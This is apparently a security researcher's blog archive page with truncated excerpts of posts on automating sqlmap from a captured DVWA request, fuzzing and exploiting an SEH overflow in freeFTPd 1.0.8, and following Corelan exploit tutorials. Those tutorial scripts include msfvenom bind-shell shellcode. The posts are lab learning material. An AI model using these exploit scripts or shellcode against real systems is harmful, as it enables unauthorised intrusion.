Posts

Showing posts from July, 2015

Python script to convert an HTTP Web Request to a sqlmap Command

Today I was working with OWASP ZAP and sqlmap for some testing. I found that for the testing I was doing I needed a script to automate the creation of the sqlmap command from the input of an HTTP web request. I will demonstrate how I am utilizing it below:

Below is a screen shot of OWASP ZAP area where the request is shown after it is configured to show a combined view of the header and the content.


This is an example of an HTTP POST request during the login stage of getting into DVWA. Inside this box you can right-click, hover over Save Raw, then Request, and then click on All. This will bring up a save dialog box. In the directory where you saved the script below, create a folder called "requests", then save the HTTP request in that folder. If you are running Kali you do not need to be root to execute this script.

Here is the script that converts the POST Request into a sqlmap command and then it will execute it upon a key press:

#!/usr/bin/python
import os
import sys
additio…

Fuzzer for freeFTPd 1.0.8

While working with freeFTPd 1.0.8 in the previous post, I found that a buffer overflow could occur in the username field if logging was enabled. I built the script below to test the other functions of the FTP server. I developed this fuzzer to identify further overflows; however, none surfaced. I also experimented with Unicode characters.

#!/usr/bin/python
import socket

server = '172.16.102.142' # Change to the IP Address of Windows 7 SP1 VM
destPort = 21
hexValues = ["\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x09","\x0a","\x0b","\x0c","\x0d","\x0e","\x0f","\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1a","\x1b","\x1c","\x1d","\x1e&quo…

freeFTPd 1.0.8 - SEH Stack Based Overflow

This post covers exploiting the freeFTPd 1.0.8 server, which has an SEH stack-based overflow. This is already documented as a Metasploit module, and other exploits have been published. I downloaded the vulnerable freeFTPd 1.0.8 server from here, then installed it on Windows XP SP2 with Immunity Debugger. To configure the freeFTPd server, create a user with a username of ftp and a password of ftp, then enable logging so it writes to a file.

First I created a python script to simulate a logon:

#!/usr/bin/python
import socket

server = '172.16.104.42' # Change to the IP Address of Windows XP SP2 VM
destPort = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, destPort))
# Receive the Banner that is returned after the initial connection
print s.recv(1024)
# Send the username to login with
userString = "USER ftp\r\n"
s.send(userString)
print userString
print s.recv(1024)
# Send the password to login with
passString = "PASS ftp\r\n&q…

Reviewing Corelan Exploit Writing Part 2

I was reviewing the Corelan Exploit Writing Tutorial Part 2, located here. Below is the Python code that I created while following the tutorial.

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
buf += "\xb5\x7f\x84\x0e\x46\xd3\xf4\x11\xc4\x2e\x29\xf1\xf5"
buf += "\xe0\x3c\xf0\x32\x1c\xcc\xa0\xeb\x6a\x63\x54\x9f\x27"
buf += "\xb…

Reviewing Corelan Exploit Writing Part 1

I reviewed the exploit writing tutorial that Corelan makes available here. After going through the tutorial I developed the following final script, which creates an m3u file that overwrites EIP with the address of a JMP ESP instruction found in the DLLs of Easy RM to MP3 Converter.

My final script is below:

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
bu…